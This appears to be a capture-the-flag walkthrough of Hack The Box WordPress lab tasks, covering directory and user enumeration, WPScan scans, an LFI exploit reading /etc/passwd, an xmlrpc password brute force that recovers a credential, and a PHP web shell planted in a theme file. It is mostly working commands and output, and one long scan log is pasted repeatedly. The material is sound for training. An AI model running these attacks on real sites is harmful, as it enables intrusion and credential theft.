HACKING WORDPRESS

DIRECTORY INDEXING

Keep in mind the key WordPress directories discussed in the WordPress Structure section. Manually enumerate the target for any directories whose contents can be listed. Browse these directories and locate a flag with the file name flag.txt and submit its contents as the answer.

#identify directories that can be listed
root@oco:~$ curl -s -X GET http://83.136.252.13:37931 | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/*' | cut -d"'" -f2
 http://83.136.252.13:37931/wp-content/plugins/photo-gallery/css/bwg-fonts/fonts.css?ver=0.0.1
 ...
 http://83.136.252.13:37931/wp-content/plugins/mail-masta/lib/css/mm_frontend.css?ver=5.1.6

#drill down
root@oco:~$ curl -s -X GET http://83.136.252.13:37931 | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2
 ...
 http://83.136.252.13:37931/wp-content/plugins/wp-google-places-review-slider/public/js/wprev-public-com-min.js?ver=6.1
 http://83.136.252.13:37931/wp-content/plugins/mail-masta/lib/css/mm_frontend.css?ver=5.1.6

root@oco:~$ curl -s -X GET http://83.136.252.13:37931 | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/mail-masta/*' | cut -d"'" -f2
 http://83.136.252.13:37931/wp-content/plugins/mail-masta/lib/subscriber.js?ver=5.1.6
 http://83.136.252.13:37931/wp-content/plugins/mail-masta/lib/jquery.validationEngine-en.js?ver=5.1.6
 http://83.136.252.13:37931/wp-content/plugins/mail-masta/lib/jquery.validationEngine.js?ver=5.1.6
 http://83.136.252.13:37931/wp-content/plugins/mail-masta/lib/css/mm_frontend.css?ver=5.1.6

root@oco:~$ curl -s -X GET http://83.136.252.13:37931/wp-content/plugins/mail-masta/ | html2text
 ****** Index of /wp-content/plugins/mail-masta/ ******
 ===============================================================================
 ../
 amazon_api/                                        13-May-2020 18:54
 -
 inc/                                               18-May-2020 10:28
 -
 lib/                                               13-May-2020 18:54
 -
 plugin-interface.php                               13-May-2020 18:54
 90080
 readme.txt                                         13-May-2020 18:54
 2251
===============================================================================

root@oco:~$ curl -s -X GET http://83.136.252.13:37931/wp-content/plugins/mail-masta/inc/ | html2text | grep -i flag
 flag.txt                                           18-May-2020 10:28
 
root@oco:~$ curl -s -X GET http://83.136.252.13:37931/wp-content/plugins/mail-masta/inc/flag.txt | html2text
 HTB{3num3r4t10n_15_k3y}

USER ENUMERATION

From the last cURL command, what user name is assigned to User ID 2?

root@oco:~$ curl http://blog.inlanefreight.com/wp-json/wp/v2/users | jq

[
  {
    "id": 1,
    "name": "admin",
    "url": "",
    "description": "",
    "link": "http://blog.inlanefreight.com/index.php/author/admin/",
    <SNIP>
  },
  {
    "id": 2,
    "name": "ch4p",
    "url": "",
    "description": "",
    "link": "http://blog.inlanefreight.com/index.php/author/ch4p/",
    <SNIP>
  },
<SNIP>

Search for "WordPress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer.

root@oco:~$ BROWSER > https://google.com
 Search: WordPress xmlrpc attacks
  - https://nitesculucian.github.io/2019/07/02/exploiting-the-xmlrpc-php-on-all-wordpress-versions/

root@htb:~$ curl -s -X GET {targetWPSite:port}/xmlrpc.php
 XML-RPC server accepts POST requests only.

root@oco:~$ curl -X POST http://94.237.61.28:42108/xmlrpc.php -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="utf-8"?> <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>'
 <?xml version="1.0" encoding="UTF-8"?>
 <methodResponse>
   <params>
     <param>
       <value>
       <array><data>
   <value><string>system.multicall</string></value>
   <value><string>system.listMethods</string></value>
   <value><string>system.getCapabilities</string></value>
   <value><string>demo.addTwoNumbers</string></value>
   <value><string>demo.sayHello</string></value>
   <value><string>pingback.extensions.getPingbacks</string></value>
   <value><string>pingback.ping</string></value>
   <value><string>mt.publishPost</string></value>
   <value><string>mt.getTrackbackPings</string></value>
   <value><string>mt.supportedTextFilters</string></value>
   <value><string>mt.supportedMethods</string></value>
   <value><string>mt.setPostCategories</string></value>
   <value><string>mt.getPostCategories</string></value>
   <value><string>mt.getRecentPostTitles</string></value>
   <value><string>mt.getCategoryList</string></value>
   <value><string>metaWeblog.getUsersBlogs</string></value>
   ... 
 </data></array>
       </value>
     </param>
   </params>
 </methodResponse>
 
root@htb:~$ curl -X POST http://94.237.61.28:42108/xmlrpc.php -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="utf-8"?> <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>' | grep -i \<value\>\<string | wc -l
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
 100  4399    0  4272  100   127  24349    723 --:--:-- --:--:-- --:--:-- 25137
 80

WPSCAN ENUMERATION

Enumerate the provided WordPress instance for all installed plugins. Perform a scan with WPScan against the target and submit the version of the vulnerable plugin named “photo-gallery”.

root@htb:~$ which wpscan
 /usr/local/bin/wpscan

root@htb:~$ wpscan -hh
 ...
root@htb:~$ wpscan --url http://94.237.58.172:30178 --enumerate ap
 _______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
 _______________________________________________________________

 [i] Updating the Database ...
 [i] Update completed.

 [+] URL: http://94.237.58.172:30178/ [94.237.58.172]
 [+] Started: Mon Apr  7 10:55:11 2025

 Interesting Finding(s):

 [+] Headers
  | Interesting Entry: Server: nginx
  | Found By: Headers (Passive Detection)
  | Confidence: 100%

 [+] XML-RPC seems to be enabled: http://94.237.58.172:30178/xmlrpc.php
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%
  | References:
  |  - http://codex.wordpress.org/XML-RPC_Pingback_API
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
  |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

 [+] WordPress readme found: http://94.237.58.172:30178/readme.html
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%

 [+] Upload directory has listing enabled: http://94.237.58.172:30178/wp-content/uploads/
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%

 [+] The external WP-Cron seems to be enabled: http://94.237.58.172:30178/wp-cron.php
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 60%
  | References:
  |  - https://www.iplocation.net/defend-wordpress-from-ddos
  |  - https://github.com/wpscanteam/wpscan/issues/1299

 [+] WordPress version 5.1.6 identified (Insecure, released on 2020-06-10).
  | Found By: Rss Generator (Passive Detection)
  |  - http://94.237.58.172:30178/feed/, <generator>https://wordpress.org/?v=5.1.6</generator>
  |  - http://94.237.58.172:30178/comments/feed/, <generator>https://wordpress.org/?v=5.1.6</generator>

 [+] WordPress theme in use: ben_theme
  | Location: http://94.237.58.172:30178/wp-content/themes/ben_theme/
  | Readme: http://94.237.58.172:30178/wp-content/themes/ben_theme/readme.txt
  | Style URL: http://94.237.58.172:30178/wp-content/themes/ben_theme/style.css?ver=5.1.6
  | Style Name: Transportex
  | Style URI: https://themeansar.com/free-themes/transportex/
  | Description: Transportex is a transport, logistics & home movers WordPress theme with focus on create online tran...
  | Author: Themeansar
  | Author URI: https://themeansar.com/
  |
  | Found By: Css Style In Homepage (Passive Detection)
  | Confirmed By: Css Style In 404 Page (Passive Detection)
  |
  | Version: 1.6.7 (80% confidence)
  | Found By: Style (Passive Detection)
  |  - http://94.237.58.172:30178/wp-content/themes/ben_theme/style.css?ver=5.1.6, Match: 'Version: 1.6.7'

 [+] Enumerating All Plugins (via Passive Methods)
 [+] Checking Plugin Versions (via Passive and Aggressive Methods)

 [i] Plugin(s) Identified:

 [+] mail-masta
  | Location: http://94.237.58.172:30178/wp-content/plugins/mail-masta/
  | Latest Version: 1.0 (up to date)
  | Last Updated: 2014-09-19T07:52:00.000Z
  |
  | Found By: Urls In Homepage (Passive Detection)
  | Confirmed By: Urls In 404 Page (Passive Detection)
  |
  | Version: 1.0 (80% confidence)
  | Found By: Readme - Stable Tag (Aggressive Detection)
  |  - http://94.237.58.172:30178/wp-content/plugins/mail-masta/readme.txt

 [+] photo-gallery
  | Location: http://94.237.58.172:30178/wp-content/plugins/photo-gallery/
  | Last Updated: 2025-03-29T16:55:00.000Z
  | [!] The version is out of date, the latest version is 1.8.35
  |
  | Found By: Urls In Homepage (Passive Detection)
  | Confirmed By: Urls In 404 Page (Passive Detection)
  |
  | Version: 1.5.34 (100% confidence)
  | Found By: Query Parameter (Passive Detection)
  |  - http://94.237.58.172:30178/wp-content/plugins/photo-gallery/css/jquery.mCustomScrollbar.min.css?ver=1.5.34
  |  - http://94.237.58.172:30178/wp-content/plugins/photo-gallery/css/styles.min.css?ver=1.5.34
  |  - http://94.237.58.172:30178/wp-content/plugins/photo-gallery/js/jquery.mCustomScrollbar.concat.min.js?ver=1.5.34
  |  - http://94.237.58.172:30178/wp-content/plugins/photo-gallery/js/scripts.min.js?ver=1.5.34
  | Confirmed By:
  |  Readme - Stable Tag (Aggressive Detection)
  |   - http://94.237.58.172:30178/wp-content/plugins/photo-gallery/readme.txt
  |  Readme - ChangeLog Section (Aggressive Detection)
  |   - http://94.237.58.172:30178/wp-content/plugins/photo-gallery/readme.txt

 [+] wp-google-places-review-slider
  | Location: http://94.237.58.172:30178/wp-content/plugins/wp-google-places-review-slider/
  | Last Updated: 2025-03-29T17:04:00.000Z
  | [!] The version is out of date, the latest version is 16.3
  |
  | Found By: Urls In Homepage (Passive Detection)
  | Confirmed By: Urls In 404 Page (Passive Detection)
  |
  | Version: 6.1 (80% confidence)
  | Found By: Readme - Stable Tag (Aggressive Detection)
  |  - http://94.237.58.172:30178/wp-content/plugins/wp-google-places-review-slider/README.txt

 [!] No WPScan API Token given, as a result vulnerability data has not been output.
 [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

 [+] Finished: Mon Apr  7 10:55:18 2025
 [+] Requests Done: 53
 [+] Cached Requests: 6
 [+] Data Sent: 12.342 KB
 [+] Data Received: 22.221 MB
 [+] Memory used: 278.969 MB
 [+] Elapsed time: 00:00:06

EXPLOITING A VULNERABLE PLUGIN

Use the same LFI vulnerability against your target and read the contents of the "/etc/passwd" file. Locate the only non-root user on the system with a login shell.

root@htb:~$ which wpscan
 /usr/local/bin/wpscan

root@htb:~$ wpscan -hh
 ...
root@htb:~$ wpscan --url http://94.237.58.172:30178 --enumerate ap
 _______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
 _______________________________________________________________

 [i] Updating the Database ...
 [i] Update completed.

 [+] URL: http://94.237.58.172:30178/ [94.237.58.172]
 [+] Started: Mon Apr  7 10:55:11 2025

 Interesting Finding(s):

 [+] Headers
  | Interesting Entry: Server: nginx
  | Found By: Headers (Passive Detection)
  | Confidence: 100%

 [+] XML-RPC seems to be enabled: http://94.237.58.172:30178/xmlrpc.php
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%
  | References:
  |  - http://codex.wordpress.org/XML-RPC_Pingback_API
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
  |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

 [+] WordPress readme found: http://94.237.58.172:30178/readme.html
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%

 [+] Upload directory has listing enabled: http://94.237.58.172:30178/wp-content/uploads/
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%

 [+] The external WP-Cron seems to be enabled: http://94.237.58.172:30178/wp-cron.php
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 60%
  | References:
  |  - https://www.iplocation.net/defend-wordpress-from-ddos
  |  - https://github.com/wpscanteam/wpscan/issues/1299

 [+] WordPress version 5.1.6 identified (Insecure, released on 2020-06-10).
  | Found By: Rss Generator (Passive Detection)
  |  - http://94.237.58.172:30178/feed/, <generator>https://wordpress.org/?v=5.1.6</generator>
  |  - http://94.237.58.172:30178/comments/feed/, <generator>https://wordpress.org/?v=5.1.6</generator>

 [+] WordPress theme in use: ben_theme
  | Location: http://94.237.58.172:30178/wp-content/themes/ben_theme/
  | Readme: http://94.237.58.172:30178/wp-content/themes/ben_theme/readme.txt
  | Style URL: http://94.237.58.172:30178/wp-content/themes/ben_theme/style.css?ver=5.1.6
  | Style Name: Transportex
  | Style URI: https://themeansar.com/free-themes/transportex/
  | Description: Transportex is a transport, logistics & home movers WordPress theme with focus on create online tran...
  | Author: Themeansar
  | Author URI: https://themeansar.com/
  |
  | Found By: Css Style In Homepage (Passive Detection)
  | Confirmed By: Css Style In 404 Page (Passive Detection)
  |
  | Version: 1.6.7 (80% confidence)
  | Found By: Style (Passive Detection)
  |  - http://94.237.58.172:30178/wp-content/themes/ben_theme/style.css?ver=5.1.6, Match: 'Version: 1.6.7'

 [+] Enumerating All Plugins (via Passive Methods)
 [+] Checking Plugin Versions (via Passive and Aggressive Methods)

 [i] Plugin(s) Identified:

 [+] mail-masta
  | Location: http://94.237.58.172:30178/wp-content/plugins/mail-masta/
  | Latest Version: 1.0 (up to date)
  | Last Updated: 2014-09-19T07:52:00.000Z
  |
  | Found By: Urls In Homepage (Passive Detection)
  | Confirmed By: Urls In 404 Page (Passive Detection)
  |
  | Version: 1.0 (80% confidence)
  | Found By: Readme - Stable Tag (Aggressive Detection)
  |  - http://94.237.58.172:30178/wp-content/plugins/mail-masta/readme.txt

 [+] photo-gallery
  | Location: http://94.237.58.172:30178/wp-content/plugins/photo-gallery/
  | Last Updated: 2025-03-29T16:55:00.000Z
  | [!] The version is out of date, the latest version is 1.8.35
  |
  | Found By: Urls In Homepage (Passive Detection)
  | Confirmed By: Urls In 404 Page (Passive Detection)
  |
  | Version: 1.5.34 (100% confidence)
  | Found By: Query Parameter (Passive Detection)
  |  - http://94.237.58.172:30178/wp-content/plugins/photo-gallery/css/jquery.mCustomScrollbar.min.css?ver=1.5.34
  |  - http://94.237.58.172:30178/wp-content/plugins/photo-gallery/css/styles.min.css?ver=1.5.34
  |  - http://94.237.58.172:30178/wp-content/plugins/photo-gallery/js/jquery.mCustomScrollbar.concat.min.js?ver=1.5.34
  |  - http://94.237.58.172:30178/wp-content/plugins/photo-gallery/js/scripts.min.js?ver=1.5.34
  | Confirmed By:
  |  Readme - Stable Tag (Aggressive Detection)
  |   - http://94.237.58.172:30178/wp-content/plugins/photo-gallery/readme.txt
  |  Readme - ChangeLog Section (Aggressive Detection)
  |   - http://94.237.58.172:30178/wp-content/plugins/photo-gallery/readme.txt

 [+] wp-google-places-review-slider
  | Location: http://94.237.58.172:30178/wp-content/plugins/wp-google-places-review-slider/
  | Last Updated: 2025-03-29T17:04:00.000Z
  | [!] The version is out of date, the latest version is 16.3
  |
  | Found By: Urls In Homepage (Passive Detection)
  | Confirmed By: Urls In 404 Page (Passive Detection)
  |
  | Version: 6.1 (80% confidence)
  | Found By: Readme - Stable Tag (Aggressive Detection)
  |  - http://94.237.58.172:30178/wp-content/plugins/wp-google-places-review-slider/README.txt

 [!] No WPScan API Token given, as a result vulnerability data has not been output.
 [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

 [+] Finished: Mon Apr  7 10:55:18 2025
 [+] Requests Done: 53
 [+] Cached Requests: 6
 [+] Data Sent: 12.342 KB
 [+] Data Received: 22.221 MB
 [+] Memory used: 278.969 MB
 [+] Elapsed time: 00:00:06

#verify vulnerable plugin
root@oco:~$ BROWSER > https://www.exploit-db.com/exploits/40290/
 ...
 
 * this exploit focuses on an unauthenticated user reading local files through the path /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

#exploit identified vulnerable plugin
root@oco:~$ curl -X GET http://94.237.58.172:30178/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
 root:x:0:0:root:/root:/bin/ash
 bin:x:1:1:bin:/bin:/sbin/nologin
 daemon:x:2:2:daemon:/sbin:/sbin/nologin
 adm:x:3:4:adm:/var/adm:/sbin/nologin
 lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
 sync:x:5:0:sync:/sbin:/bin/sync
 shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
 halt:x:7:0:halt:/sbin:/sbin/halt
 mail:x:8:12:mail:/var/mail:/sbin/nologin
 news:x:9:13:news:/usr/lib/news:/sbin/nologin
 uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
 operator:x:11:0:operator:/root:/sbin/nologin
 man:x:13:15:man:/usr/man:/sbin/nologin
 postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
 cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
 ftp:x:21:21::/var/lib/ftp:/sbin/nologin
 sshd:x:22:22:sshd:/dev/null:/sbin/nologin
 at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
 squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
 xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
 games:x:35:35:games:/usr/games:/sbin/nologin
 cyrus:x:85:12::/usr/cyrus:/sbin/nologin
 vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
 ntp:x:123:123:NTP:/var/empty:/sbin/nologin
 smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
 guest:x:405:100:guest:/dev/null:/sbin/nologin
 nobody:x:65534:65534:nobody:/:/sbin/nologin
 mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin
 nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin
 wp-user:x:1000:1000:Linux User,,,:/home/wp-user:/sbin/nologin
 sally.jones:x:1001:1001:Linux User,,,:/home/sally.jones:/bin/bash
 <br />
 <b>Fatal error</b>:  Uncaught Error: Call to a member function get_results() on null in /usr/src/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php:19
 Stack trace:
 #0 {main}
  thrown in <b>/usr/src/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php</b> on line <b>19</b><br />

root@htb:~$ curl -X GET http://94.237.58.172:30178/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd | grep -v nologin
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
 100  1726    0  1726    0     0  10957      0 --:--:-- --:--:-- --:--:-- 10993
 root:x:0:0:root:/root:/bin/ash
 sync:x:5:0:sync:/sbin:/bin/sync
 shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
 halt:x:7:0:halt:/sbin:/sbin/halt
 sally.jones:x:1001:1001:Linux User,,,:/home/sally.jones:/bin/bash
 <br />
 <b>Fatal error</b>:  Uncaught Error: Call to a member function get_results() on null in /usr/src/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php:19
 Stack trace:
 #0 {main}
  thrown in <b>/usr/src/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php</b> on line <b>19</b><br />

ATTACKING WORDPRESS USERS

Perform a bruteforce attack against the user "roger" on your target with the wordlist "rockyou.txt". Submit the user's password as the answer.

root@htb:~$ find / -iname rockyou* 2>/dev/null
 /usr/share/wordlists/rockyou.txt.gz

root@htb:~$ sudo gunzip -c /usr/share/wordlists/rockyou.txt.gz > ./rockyou.txt
 ...

root@htb:~$ wpscan --password-attack xmlrpc -t 20 -U roger -P rockyou.txt --url http://{targetSite:port}

 _______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
 _______________________________________________________________

 [i] Updating the Database ...
 [i] Update completed.

 [+] URL: http://94.237.55.234:36301/ [94.237.55.234]
 [+] Started: Tue Apr  8 00:20:50 2025

 Interesting Finding(s):

 [+] Headers
  | Interesting Entry: Server: nginx
  | Found By: Headers (Passive Detection)
  | Confidence: 100%

 [+] XML-RPC seems to be enabled: http://94.237.55.234:36301/xmlrpc.php
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%
  | References:
  |  - http://codex.wordpress.org/XML-RPC_Pingback_API
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
  |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

 [+] WordPress readme found: http://94.237.55.234:36301/readme.html
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%

 [+] Upload directory has listing enabled: http://94.237.55.234:36301/wp-content/uploads/
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%

 [+] The external WP-Cron seems to be enabled: http://94.237.55.234:36301/wp-cron.php
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 60%
  | References:
  |  - https://www.iplocation.net/defend-wordpress-from-ddos
  |  - https://github.com/wpscanteam/wpscan/issues/1299

 [+] WordPress version 5.1.6 identified (Insecure, released on 2020-06-10).
  | Found By: Rss Generator (Passive Detection)
  |  - http://94.237.55.234:36301/feed/, <generator>https://wordpress.org/?v=5.1.6</generator>
  |  - http://94.237.55.234:36301/comments/feed/, <generator>https://wordpress.org/?v=5.1.6</generator>

 [+] WordPress theme in use: ben_theme
  | Location: http://94.237.55.234:36301/wp-content/themes/ben_theme/
  | Readme: http://94.237.55.234:36301/wp-content/themes/ben_theme/readme.txt
  | Style URL: http://94.237.55.234:36301/wp-content/themes/ben_theme/style.css?ver=5.1.6
  | Style Name: Transportex
  | Style URI: https://themeansar.com/free-themes/transportex/
  | Description: Transportex is a transport, logistics & home movers WordPress theme with focus on create online tran...
  | Author: Themeansar
  | Author URI: https://themeansar.com/
  |
  | Found By: Css Style In Homepage (Passive Detection)
  | Confirmed By: Css Style In 404 Page (Passive Detection)
  |
  | Version: 1.6.7 (80% confidence)
  | Found By: Style (Passive Detection)
  |  - http://94.237.55.234:36301/wp-content/themes/ben_theme/style.css?ver=5.1.6, Match: 'Version: 1.6.7'

 [+] Enumerating All Plugins (via Passive Methods)
 [+] Checking Plugin Versions (via Passive and Aggressive Methods)

 [i] Plugin(s) Identified:

 [+] mail-masta
  | Location: http://94.237.55.234:36301/wp-content/plugins/mail-masta/
  | Latest Version: 1.0 (up to date)
  | Last Updated: 2014-09-19T07:52:00.000Z
  |
  | Found By: Urls In Homepage (Passive Detection)
  | Confirmed By: Urls In 404 Page (Passive Detection)
  |
  | Version: 1.0 (80% confidence)
  | Found By: Readme - Stable Tag (Aggressive Detection)
  |  - http://94.237.55.234:36301/wp-content/plugins/mail-masta/readme.txt

 [+] photo-gallery
  | Location: http://94.237.55.234:36301/wp-content/plugins/photo-gallery/
  | Last Updated: 2025-03-29T16:55:00.000Z
  | [!] The version is out of date, the latest version is 1.8.35
  |
  | Found By: Urls In Homepage (Passive Detection)
  | Confirmed By: Urls In 404 Page (Passive Detection)
  |
  | Version: 1.5.34 (100% confidence)
  | Found By: Query Parameter (Passive Detection)
  |  - http://94.237.55.234:36301/wp-content/plugins/photo-gallery/css/jquery.mCustomScrollbar.min.css?ver=1.5.34
  |  - http://94.237.55.234:36301/wp-content/plugins/photo-gallery/css/styles.min.css?ver=1.5.34
  |  - http://94.237.55.234:36301/wp-content/plugins/photo-gallery/js/jquery.mCustomScrollbar.concat.min.js?ver=1.5.34
  |  - http://94.237.55.234:36301/wp-content/plugins/photo-gallery/js/scripts.min.js?ver=1.5.34
  | Confirmed By:
  |  Readme - Stable Tag (Aggressive Detection)
  |   - http://94.237.55.234:36301/wp-content/plugins/photo-gallery/readme.txt
  |  Readme - ChangeLog Section (Aggressive Detection)
  |   - http://94.237.55.234:36301/wp-content/plugins/photo-gallery/readme.txt

 [+] wp-google-places-review-slider
  | Location: http://94.237.55.234:36301/wp-content/plugins/wp-google-places-review-slider/
  | Last Updated: 2025-03-29T17:04:00.000Z
  | [!] The version is out of date, the latest version is 16.3
  |
  | Found By: Urls In Homepage (Passive Detection)
  | Confirmed By: Urls In 404 Page (Passive Detection)
  |
  | Version: 6.1 (80% confidence)
  | Found By: Readme - Stable Tag (Aggressive Detection)
  |  - http://94.237.55.234:36301/wp-content/plugins/wp-google-places-review-slider/README.txt

 [+] Enumerating Config Backups (via Passive and Aggressive Methods)
  Checking Config Backups - Time: 00:00:02 <===============================================================================================================> (137 / 137) 100.00% Time: 00:00:02

 [i] No Config Backups Found.

 [+] Performing password attack on Xmlrpc against 1 user/s
 [SUCCESS] - roger / lizard                                                                                                                                                                    
 Trying roger / 8675309 Time: 00:00:33 <                                                                                                              > (1900 / 14346292)  0.01%  ETA: ??:??:??

 [!] Valid Combinations Found:
  | Username: roger, Password: lizard

 [!] No WPScan API Token given, as a result vulnerability data has not been output.
 [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

 [+] Finished: Tue Apr  8 00:21:34 2025
 [+] Requests Done: 2092
 [+] Cached Requests: 6
 [+] Data Sent: 1.031 MB
 [+] Data Received: 23.442 MB
 [+] Memory used: 319.91 MB
 [+] Elapsed time: 00:00:43

REMOTE CODE EXECUTION (RCE) VIA THE THEME EDITOR

Use the credentials for the admin user [admin:sunshine1] and upload a webshell to your target. Once you have access to the target, obtain the contents of the "flag.txt" file in the home directory for the "wp-user" directory.

root@htb:~$ BROWSER > {targetWPSite:port}
 username: {admin}
 password: {adminPassword}
 
root@htb:~$ BROWSER > {targetWPSite:port} > Appearance > Theme Editor
 Select Theme To Edit: Twenty Seventeen
 Theme Files: 404 Template

 * select an inactive theme in order to avoid corrupting the main theme.
 * choose a non-critical file such as 404.php to modify and add a web shell.

 Selected File Content

  <?php

    system($_GET['cmd']);

  /**
  * The template for displaying 404 pages (not found)
  *
  * @link https://codex.wordpress.org/Creating_an_Error_404_Page
  <SNIP>
  
  * click on "update file" once done

root@htb:~$ curl -X GET "http://94.237.55.234:36301/wp-content/themes/twentyseventeen/404.php?cmd=id"
 uid=1000(wp-user) gid=1000(wp-user) groups=1000(wp-user)
 <br />
 <b>Fatal error</b>:  Uncaught Error: Call to undefined function get_header() in /usr/src/wordpress/wp-content/themes/twentyseventeen/404.php:16
 Stack trace:
 #0 {main}
  thrown in <b>/usr/src/wordpress/wp-content/themes/twentyseventeen/404.php</b> on line <b>16</b><br />

root@htb:~$ curl -X GET "http://94.237.55.234:36301/wp-content/themes/twentyseventeen/404.php?cmd=ls+/home"
 wp-user
 <br />
 <b>Fatal error</b>:  Uncaught Error: Call to undefined function get_header() in /usr/src/wordpress/wp-content/themes/twentyseventeen/404.php:16
 Stack trace:
 #0 {main}
  thrown in <b>/usr/src/wordpress/wp-content/themes/twentyseventeen/404.php</b> on line <b>16</b><br />

root@htb:~$ curl -X GET "http://94.237.55.234:36301/wp-content/themes/twentyseventeen/404.php?cmd=ls+/home/wp-user"
 flag.txt
 <br />
 <b>Fatal error</b>:  Uncaught Error: Call to undefined function get_header() in /usr/src/wordpress/wp-content/themes/twentyseventeen/404.php:16
 Stack trace:
 #0 {main}
  thrown in <b>/usr/src/wordpress/wp-content/themes/twentyseventeen/404.php</b> on line <b>16</b><br />
  
root@htb:~$ curl -X GET "http://94.237.55.234:36301/wp-content/themes/twentyseventeen/404.php?cmd=cat+/home/wp-user/flag.txt"
 HTB{rc3_By_d3s1gn}
 <br />
 <b>Fatal error</b>:  Uncaught Error: Call to undefined function get_header() in /usr/src/wordpress/wp-content/themes/twentyseventeen/404.php:16
 Stack trace:
 #0 {main}
  thrown in <b>/usr/src/wordpress/wp-content/themes/twentyseventeen/404.php</b> on line <b>16</b><br />

PreviousWEB SERVICE & API ATTACKS NextBUG BOUNTY HUNTING PROCESS

Last updated 8 months ago